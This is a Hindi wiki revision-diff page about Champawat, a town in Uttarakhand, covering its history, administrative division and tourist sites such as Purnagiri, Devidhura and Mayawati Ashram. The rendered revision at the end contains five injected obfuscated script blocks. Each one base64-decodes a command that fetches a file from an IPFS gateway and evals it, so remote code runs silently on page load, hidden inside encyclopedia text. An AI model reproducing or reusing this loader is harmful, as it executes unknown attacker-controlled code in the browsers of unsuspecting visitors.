Difference between revisions of "चम्पावत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{सूचना बक्सा पर्यटन
+
{{सूचना बक्सा चम्पावत}}
|चित्र=Devidhura1.JPG
+
{{लेख सूची
|विवरण=प्रकृति की गोद में बसा [[उत्तराखण्ड]] का यह छोटा-सा नगर स्वयं में बड़ा [[इतिहास]] समेटे है।
+
|लेख का नाम=चम्पावत
|राज्य=[[उत्तराखण्ड]]
+
|पर्यटन=चम्पावत पर्यटन
|ज़िला=[[चम्पावत ज़िला]]
+
|ज़िला=चम्पावत ज़िला
|निर्माता=
 
|स्वामित्व=
 
|प्रबंधक=
 
|निर्माण काल=
 
|स्थापना=
 
|भौगोलिक स्थिति=
 
|मार्ग स्थिति=यह शहर सड़कमार्ग द्वारा [[टनकपुर]] लगभग 75 कि.मी.  दूरी पर स्थित है।
 
|प्रसिद्धि=[[देवीधुरा मेला]], [[बग्वाल]], [[एवटमाउन्ट]], ‎[[पूर्णागिरि मेला]] ‎
 
|कब जाएँ=
 
|यातायात=
 
|हवाई अड्डा=पन्तनगर,  नैनी सैनी हवाई अड्डा, [[पिथौरागढ़ ]]
 
|रेलवे स्टेशन=[[टनकपुर]] रेलवे स्टेशन
 
|बस अड्डा=
 
|कैसे पहुँचें=किसी भी शहर से बस और टैक्सी द्वारा पहुँचा जा सकता है।
 
|क्या देखें=[[उत्तराखण्ड पर्यटन]]
 
|कहाँ ठहरें=
 
|क्या खायें=
 
|क्या ख़रीदें=गहत स्थानीय दाल,
 
|एस.टी.डी. कोड=0176
 
|ए.टी.एम=   
 
|सावधानी=बरसात में भूस्खलन
 
|मानचित्र लिंक=[http://maps.google.co.in/maps?hl=en&sz=9&sll=28.991325,77.931519&q=Mussoorie,+Uttarakhand&ie=UTF8&hq=&hnear=Mussoorie,+Dehradun,+Uttarakhand&gl=in&ll=30.440386,78.024902&spn=0.542267,1.234589&z=10 गूगल मानचित्र], [http://maps.google.co.in/maps?f=d&source=s_d&saddr=Jolly+Grant+Airport+(DED),+Uttarakhand&daddr=The+Mall,+Mussoorie,+248179+(Park+Plaza+Sylverton+Mussoorie)&geocode=FTqqzAEdsd6oBCEZey73T_HQPw%3BFey20AEdvGGnBCGHrpwXIGx7Ow&gl=in&hl=en&mra=pd&mrcr=0&sll=30.451337,78.078976&sspn=0.067776,0.154324&ie=UTF8&ll=30.34088,78.202057&spn=0.54282,1.234589&z=10 हवाई अड्डा]
 
|संबंधित लेख=
 
|पाठ 1=
 
|शीर्षक 1=
 
|पाठ 2=
 
|शीर्षक 2=
 
|अन्य जानकारी=चम्पावत में आप [[बग्वाल]] का भी आनन्द ले सकते हैं।
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
 
}}
 
}}
 
+
[[चित्र:Champawat.jpg|thumb||left|250px|1815 में [[कुमाऊँ]] की राजधानी [[चम्पावत ज़िला|चम्पावत]]]]
'''चम्पावत''' [[टनकपुर]] से 75 किमी की दूरी पर राष्ट्रीय राजमार्ग कि किनारे  [[उत्तराखण्ड]] राज्य के [[चम्पावत ज़िला|चम्पावत ज़िले]] का प्रशासनिक मुख्यालय है।  यह स्थल ऐतिहासिक होने के साथ साथ अत्यंत मनोहारी एवं नैसर्गिक छटासे परिपूर्ण है स्रथल के नजदी मानेश्वर की चोटी से भव्य हिम श्रंखलाओं का मन भावन दृष्य पर्यटकों कों अपनीओर आकर्षित कर लेता है पहाड़ों और मैदानों के बीच से होकर बहती नदियाँ अद्भुत छटा बिखेरती हैं। चंपावत में पर्यटकों को वह सब कुछ मिलता है जो वह एक पर्वतीय स्थान से चाहते हैं। यह नगर समुद्र तल से लगभग 1.6 किमी की ऊँचाई पर स्थित है।
+
'''चम्पावत''' [[टनकपुर]] से 75 किमी की दूरी पर राष्ट्रीय राजमार्ग कि किनारे  [[उत्तराखण्ड]] राज्य के [[चम्पावत ज़िला|चम्पावत ज़िले]] का प्रशासनिक मुख्यालय है।  यह स्थल ऐतिहासिक होने के साथ साथ अत्यंत मनोहारी एवं नैसर्गिक छटासे परिपूर्ण है स्रथल के नजदी मानेश्वर की चोटी से भव्य हिम श्रंखलाओं का मन भावन दृष्य पर्यटकों कों अपनीओर आकर्षित कर लेता है पहाड़ों और मैदानों के बीच से होकर बहती नदियाँ अद्भुत छटा बिखेरती हैं। चंपावत में पर्यटकों को वह सब कुछ मिलता है जो वह एक पर्वतीय स्थान से चाहते हैं। यह नगर समुद्र तल से लगभग 1.6 किमी की ऊँचाई पर स्थित है।  
 +
==स्थापना==
 +
[[चित्र:District.jpg|thumb||left|250px|[[2010]] में [[चम्पावत ज़िला|चम्पावत ज़िले]] का प्रशासनिक मुख्यालय]]
 
उत्तराखण्ड की राज्य में प्रशासनिक सुविधा के उद्देश्य से दो मुख्य संभाग (मंडल) बनाऐ गये हैं [[गढ़वाल]] तथा [[कुमाऊँ]]। कुमाऊँ संभाग (मंडल) में [[नैनीताल]], [[पिथौरागढ़]], [[अल्मोड़ा]], [[बागेश्वर]], चम्पावत तथा [[ऊधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढ़वाल संभाग में [[पौडी गढ़वाल]], [[टिहरी गढ़वाल]], [[उत्तरकाशी]], [[देहरादून]], [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।  
 
उत्तराखण्ड की राज्य में प्रशासनिक सुविधा के उद्देश्य से दो मुख्य संभाग (मंडल) बनाऐ गये हैं [[गढ़वाल]] तथा [[कुमाऊँ]]। कुमाऊँ संभाग (मंडल) में [[नैनीताल]], [[पिथौरागढ़]], [[अल्मोड़ा]], [[बागेश्वर]], चम्पावत तथा [[ऊधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढ़वाल संभाग में [[पौडी गढ़वाल]], [[टिहरी गढ़वाल]], [[उत्तरकाशी]], [[देहरादून]], [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।  
 
==इतिहास==
 
==इतिहास==
[[चित्र:Buransh_.JPG|thumb||left|250px|एवटमाउन्ट में खिला पर्वतीय पुष्प बुरांस]]
+
[[चित्र:Champawat1.jpg|thumb||left|250px|कत्यूरी वंश के राजाओं द्वारा स्थापित तेरहवीं शताब्दी का मंदिर]]
 
चम्पावत कई वर्षों तक [[कुमाऊँ]] के शासकों की राजधानी रहा है। चम्पावत नगर में कत्यूरी वंश के राजाओं द्वारा स्थापित तेरहवीं शताब्दी का बालेश्वर मंदिर तत्काली शिल्प कला का एक उत्कृष्ट नमूना है।  
 
चम्पावत कई वर्षों तक [[कुमाऊँ]] के शासकों की राजधानी रहा है। चम्पावत नगर में कत्यूरी वंश के राजाओं द्वारा स्थापित तेरहवीं शताब्दी का बालेश्वर मंदिर तत्काली शिल्प कला का एक उत्कृष्ट नमूना है।  
 +
==चम्पावत का महत्त्व==
 +
*[[सिक्ख|सिक्खों]] के दसवें गुरु [[गुरु गोविंद सिंह]] यहाँ आये थे
 +
*यह स्थल पूर्व मे ऐंग्लो इन्डियन कालोनी के रूप में विद्यमान रहा है।
 +
*जनपद चम्पावत के [[टनकपुर]] उप संभाग के पर्वतीय अंचल में स्थित अन्नपूर्णा चोटी के शिखर में लगभग 3000 फिट की उंचाई पर [[पूर्णागिरि मंदिर|पूर्णागिरि शक्ति पीठ]] स्थापित है।
 +
*जनश्रुति है कि यहां आदिगुरु गोरखनाथ की धूनी [[सतयुग]] से लगातार प्रज्वलित है।
 +
*किंवदंती है कि यहां पर [[कृष्ण]] के द्वारा अपने पौत्र का अपहरण किये जाने से क्रुद्ध होकर वाणासुर का वध किया गया था।
 
==पर्यटन==
 
==पर्यटन==
{{main|पूर्णागिरि मेला}}
+
{{main|चम्पावत पर्यटन}}
===[[पूर्णागिरि मेला|पूर्णागिरि मंदिर]]===
+
पर्यटकों के लिये यहाँ ब्रिटिश काल का एक सरकारी बंगला, मायावती अद्वैत आश्रम, एवटमाउन्ट गिरजाघर, वाणासुर का क़िला और चाय बागान भी हैं। उत्तराखण्ड के इस ऐतिहासिक शहर का धार्मिक, और सांस्कृतिक दृष्टि से अग्रणी स्थान है। इस शहर का उल्लेख भारत के धार्मिक ग्रन्थों में भी मिलता है।
पुन्यागिरि समुद्र तल से 3000 मीटर की उंचाई पर हैयह काली नदी के दांये किनारे पर स्थित है यहां विश्वत संक्रांति को मेला आरंभ होकर लभगग चालीस दिन तक चलता है मार्च अप्रैल के मध्य चैत्र मास की नवरात्रि में यहां अपार श्रद्धालु दर्शनार्थ आते हैं।
 
जनपद चम्पावत के टनकपुर उप संभाग के पर्वतीय अंचल में स्थित अन्नपूर्णा चोटी के शिखर में लगभग 3000 फिट की उंचाई पर यह शक्ति पीठ स्थापित है धार्मिक आस्था के साथ ही नैसर्गिक सौंदर्य के लिये भी यह स्थल महत्वपूर्ण है इस स्थल पर जाने हेतु टनकाुन से लगगभग 20 किमी तक मोटर मार्ग से तथा 3 किमी पैदल चलकर पहुचा जा सकता है।
 
===[[श्यामलाताल]]===
 
टनकपुर से चम्पावत की ओर लगभग 22 किमी दूरी पर स्थित सूचीढांड नामक स्थान से 5 किमी इस पवित्र एवं मनोहारी स्थल हेतु मोटर मार्ग से पहुंचा जा सकता है यहां पर स्वामी विवेकानन्छकी घ्यान स्थली के रूप में वर्तमान में एक आश्रम स्थापित है श्यामल ताल के स्वच्छ एवं नीले जल पर नोका विहार का आनन्द लियाा जा सकता है रात्रि विश्राम हेतु यहां पर पर्यटक आवास ग्रह उपलब्ध है देवीधुरा मेला
 
===[[मीठा रीठा साहिब]]===
 
रीठा साहिब यह स्थान लोहाघाट से लगभग 64 किमी की दूरीपर स्थित है सिक्खों के दसवें गुरू यहां आये थे एवं उन्होंने यहां पर रीठे के वृक्ष के नीचे विश्राम किया था । गुरू के प्रताप से उनके शिष्य ने जिस वृक्ष से अपनी क्षुधा शान्त करने हेतु रीठे तोडे थे , उस वृक्ष के रीठे मीठे हो गये थे। इस स्थल को मीठा रीठा साहिब भी कहा जाता है  यहां पर सिक्खों द्वारा भव्य गुरूद्वारा निर्मित किया गया है। प्रति वर्ष वैशाखी पर यहां पर बहुत विशाल मेले का आयोजन भी किया जाता है
 
===[[आदिगुरू गोरखनाथ की धूनी]]===
 
आदिगुरू गोरखनाथ की धूनी चम्पावत से लगभग 33किमी की दूरी परस्थित मं चनामक स्थान से इस स्थल हेतु लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थान पर पहुंचा जा सकता है । जनश्रुति है कि यह धूनी सतयुग से लगातार प्रज्वलित है। यह स्थल नैसर्गिक सौंदर्यता से परिपूर्ण है।
 
===[[पंचेश्वर महादेव मंदिर]]===
 
परमेश्वर लोहाघाट से लगभग 38 किमी की दूरी पर काली एवं सरयू नदी के संगम पर स्थित यह स्थल मत्स्य आखेट एवं रिवर राफ्टिंग के लिये विख्यात है। इस स्थल पर मकर संक्रान्ति के अवसर पर विशाल मेले का आयोजन भी किया जाता है ।
 
===[[वाणासुर का किला]]===
 
लोहाघाट से लगभग 7 किमी की दूरी पर कर्णरायत नामक स्थान से लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थल पर पहुंचा जा सकता है। किंवदंती है कि यहां  पर कृष्ण के द्वारा अपने पौत्र का अपहरण किये जाने से क्रुद्ध होकर वाणासुर का वध किया गया था। इस स्थल पर पुरातात्विक दृष्टि से मशहूर किला आज भी विद्यमान है । इस स्थल से एक ओर भव्य हिमालय श्रंखलाओं का दृश्य देखा जा सकता है। तो दूसरी ओर [[लोहाघाट]] सहित [[मायावती अद्वैत आश्रम|मायावती आश्रम]] एवं अन्य नैसर्गिक छटाओं का भी आनन्द लिया जा सकता है।
 
===[[मायावती अद्वैत आश्रम]]===
 
मायावती अद्वैत आश्रम लोहाघाट से 9 किमी की दूरी परसघन बांज एवं बुरांस वृक्षों के बीच स्थापित मायावती आश्रमा स्वामी विवेकानन्द का आश्रय स्थल रहा है। यहां पर स्वामी विवेकानन्द 1901 में आये थे एवं लगभग एक सप्ताह तक इस स्थल पर उन्होंने निवास किया था। यहां पर वर्तमान में एक धर्मार्थ चिकित्सालय भी आश्रम द्वारा संचालित किया जाता है।
 
{{main|देवीधुरा मेला}}
 
===[[देवीधुरा मेला|देवीधुरा मंदिर]]===
 
देवीधुरा यह स्थल चम्पावत हल्द्वानी मोटर मार्ग परचम्पावत से लगभग 60 किमी की दूरी पर समुद्र सतह से लगभग 6500 फिट कीउंचाई पर स्थित है। श्रावण मास की पूर्णिमा को हजारों श्रद्धालुओं को आकर्षित करने वाला पौराणिक धार्मिक एवं एतिहासिक स्थल देवीधुरा अपने अनूठे तरह के पाषाण युद्ध के लिये पूरे भारत प्रसिद्ध है। इस स्थल से लगभग 300 किमी लम्बी हिम श्रंखलाओं के भव्य दृश्य का आनंद लिया जा सकता है।
 
===[[एवटमाउन्ट]]===
 
लोहाघाट से 9 किमी की दूरी पर समुद्र तल से लगभग 7000 फिट की उंचाई पर स्थित यह स्थल अत्यन्त दर्शनीय है यहां पर 1945 में स्थापिन चर्च भी विद्यमान है। यह स्थल पूर्व मे ऐंग्लो इन्डियन कालोनी के रूप में विद्यमान रहा है। इस स्थल के उत्तर की ओर भव्य हिमालय श्रंखलाओं का विहंगम दृश्य दृष्टिगोचर होता है। तो दूसरी ओर प्राकृतिक छटाओं का भी आनन्द लिया जा सकता है।
 
===[[लोहाघाट]]===
 
लोहाघाट चम्पावत नगर से 13 किमी कीदूरी पर राष्ट्रीय राजमार्ग के किनारे सघन देवदार वृक्षों से आक्ष्छाादित यह  स्थल समुद्र सतहसे लगभग 5500 फिट की उंचाई पर लोहवती नदी के समीव स्थित है। स्वास्थ्य लाभ के लिये यह स्थल अत्यंत उपयुक्त माना गया है ।
 
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
 +
चित्र:Tea_plant.jpg|चम्पावत  में चाय का वृक्षारोपण
 +
चित्र:Buransh_.JPG|एवटमाउन्ट में खिला पर्वतीय पुष्प बुरांस
 
चित्र:Devidhura1.JPG|देवीधुरा कस्बे की प्राकृतिक छटा
 
चित्र:Devidhura1.JPG|देवीधुरा कस्बे की प्राकृतिक छटा
 
चित्र:Devidhura2.JPG|माँ बाराही की गुफा का उत्तरी प्रवेश मार्ग
 
चित्र:Devidhura2.JPG|माँ बाराही की गुफा का उत्तरी प्रवेश मार्ग
Line 72: Line 31:
 
चित्र:Devidhura4.JPG|बग्वाल (पत्थर मार युद्ध) में बचाव के उपयोग में लायी जाने वाली ढालें  
 
चित्र:Devidhura4.JPG|बग्वाल (पत्थर मार युद्ध) में बचाव के उपयोग में लायी जाने वाली ढालें  
 
चित्र:Devidhura5.JPG|युद्ध स्थल मंदिर प्रांगण
 
चित्र:Devidhura5.JPG|युद्ध स्थल मंदिर प्रांगण
चित्र:Devidhura6.JPG|बग्वाल (पत्थर मार युद्ध) का स्थल
+
चित्र:Devidhura6.JPG|[[बग्वाल]] (पत्थर मार युद्ध) का स्थल
 
चित्र:Devidhura7.JPG|भीम शिला
 
चित्र:Devidhura7.JPG|भीम शिला
 
चित्र:Mayawati.JPG|[[मायावती अद्वैत आश्रम]]
 
चित्र:Mayawati.JPG|[[मायावती अद्वैत आश्रम]]
 
चित्र:Moumtavot.JPG|विवेकानन्द का आश्रय स्थल
 
चित्र:Moumtavot.JPG|विवेकानन्द का आश्रय स्थल
 
चित्र:Mount.JPG|[[एवटमाउन्ट]] की छटा
 
चित्र:Mount.JPG|[[एवटमाउन्ट]] की छटा
चित्र:Vanasur.JPG|वाणासुर किले  का विहंगम दृश्य
+
चित्र:Vanasur.JPG|वाणासुर क़िले का विहंगम दृश्य
चित्र:Vanasur_1.JPG|वाणासुर किले  का प्रवेश द्वार
+
चित्र:Vanasur_1.JPG|वाणासुर क़िले का प्रवेश द्वार
चित्र:Pancheshwer.jpg|घने देवदारों के बीच [[पंचेश्वर महादेव मंदिर]]
+
चित्र:Pancheshwer.jpg|घने देवदारों के बीच [[पंचेश्वर महादेव मंदिर]]  
Pancheshwer.jpg
+
चित्र:Mitha_retha_saheb.jpg|[[मीठा रीठा साहिब]] का विहंगम दृश्य
 
</gallery>
 
</gallery>
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 +
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तराखंड के पर्यटन स्थल}}
+
{{उत्तराखंड के नगर}}{{उत्तराखंड के पर्यटन स्थल}}
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
[[Category:उत्तराखंड के पर्यटन स्थल]]
 
[[Category:उत्तराखंड के पर्यटन स्थल]]
[[Category:धार्मिक स्थल कोश]]
 
[[Category:हिन्दू धार्मिक स्थल]]
 
__INDEX__
 
__NOTOC__
 
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
{{उत्तराखंड के नगर}}
 
[[Category:उत्तराखंड]][[Category:उत्तराखंड के पर्यटन स्थल]][[Category: पर्यटन कोश]]
 
 
[[Category:उत्तराखंड_के_नगर]]
 
[[Category:उत्तराखंड_के_नगर]]
 
[[Category:भारत के नगर]]
 
[[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:06, 1 June 2018

champavat
vivaran prakriti ki god mean basa uttarakhand ka yah chhota-sa nagar svayan mean b da itihas samete hai.
rajy uttarakhand
zila champavat zila
marg sthiti yah shahar s dakamarg dvara tanakapur lagabhag 75 ki.mi. doori par sthit hai.
prasiddhi devidhura mela, bagval, evatamaunt, ‎poornagiri mela
kaise pahuanchean kisi bhi shahar se bas aur taiksi dvara pahuancha ja sakata hai.
havaee adda pantanagar, naini saini havaee adda, pithauragadh
relave steshan tanakapur relave steshan
kya dekhean uttarakhand paryatan
kya kharidean gahat sthaniy dal,
es.ti.di. kod 0176
savadhani barasat mean bhooskhalan
chitr:Map-icon.gif googal manachitr, havaee adda
any janakari champavat mean ap bagval ka bhi anand le sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

champavat champavat paryatan champavat zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Champawat.jpg|thumb||left|250px|1815 mean kumaooan ki rajadhani champavat]] champavat tanakapur se 75 kimi ki doori par rashtriy rajamarg ki kinare uttarakhand rajy ke champavat zile ka prashasanik mukhyalay hai. yah sthal aitihasik hone ke sath sath atyant manohari evan naisargik chhatase paripoorn hai srathal ke najadi maneshvar ki choti se bhavy him shrankhalaoan ka man bhavan drishy paryatakoan koan apanior akarshit kar leta hai paha doan aur maidanoan ke bich se hokar bahati nadiyaan adbhut chhata bikherati haian. chanpavat mean paryatakoan ko vah sab kuchh milata hai jo vah ek parvatiy sthan se chahate haian. yah nagar samudr tal se lagabhag 1.6 kimi ki ooanchaee par sthit hai.

sthapana

[[chitr:District.jpg|thumb||left|250px|2010 mean champavat zile ka prashasanik mukhyalay]] uttarakhand ki rajy mean prashasanik suvidha ke uddeshy se do mukhy sanbhag (mandal) banaai gaye haian gadhaval tatha kumaooan. kumaooan sanbhag (mandal) mean nainital, pithauragadh, almo da, bageshvar, champavat tatha oodhamasianh nagar janapad sammilit haian jabaki gadhaval sanbhag mean paudi gadhaval, tihari gadhaval, uttarakashi, deharadoon, chamoli, rudraprayag tatha haridvar janapad shamil hai.

itihas

thumb||left|250px|katyoori vansh ke rajaoan dvara sthapit terahavian shatabdi ka mandir champavat kee varshoan tak kumaooan ke shasakoan ki rajadhani raha hai. champavat nagar mean katyoori vansh ke rajaoan dvara sthapit terahavian shatabdi ka baleshvar mandir tatkali shilp kala ka ek utkrisht namoona hai.

champavat ka mahattv

  • sikkhoan ke dasavean guru guru goviand sianh yahaan aye the
  • yah sthal poorv me aianglo indiyan kaloni ke roop mean vidyaman raha hai.
  • janapad champavat ke tanakapur up sanbhag ke parvatiy aanchal mean sthit annapoorna choti ke shikhar mean lagabhag 3000 phit ki uanchaee par poornagiri shakti pith sthapit hai.
  • janashruti hai ki yahaan adiguru gorakhanath ki dhooni satayug se lagatar prajvalit hai.
  • kianvadanti hai ki yahaan par krishna ke dvara apane pautr ka apaharan kiye jane se kruddh hokar vanasur ka vadh kiya gaya tha.

paryatan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

paryatakoan ke liye yahaan british kal ka ek sarakari bangala, mayavati advait ashram, evatamaunt girajaghar, vanasur ka qila aur chay bagan bhi haian. uttarakhand ke is aitihasik shahar ka dharmik, aur saanskritik drishti se agrani sthan hai. is shahar ka ullekh bharat ke dharmik granthoan mean bhi milata hai.

vithika


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>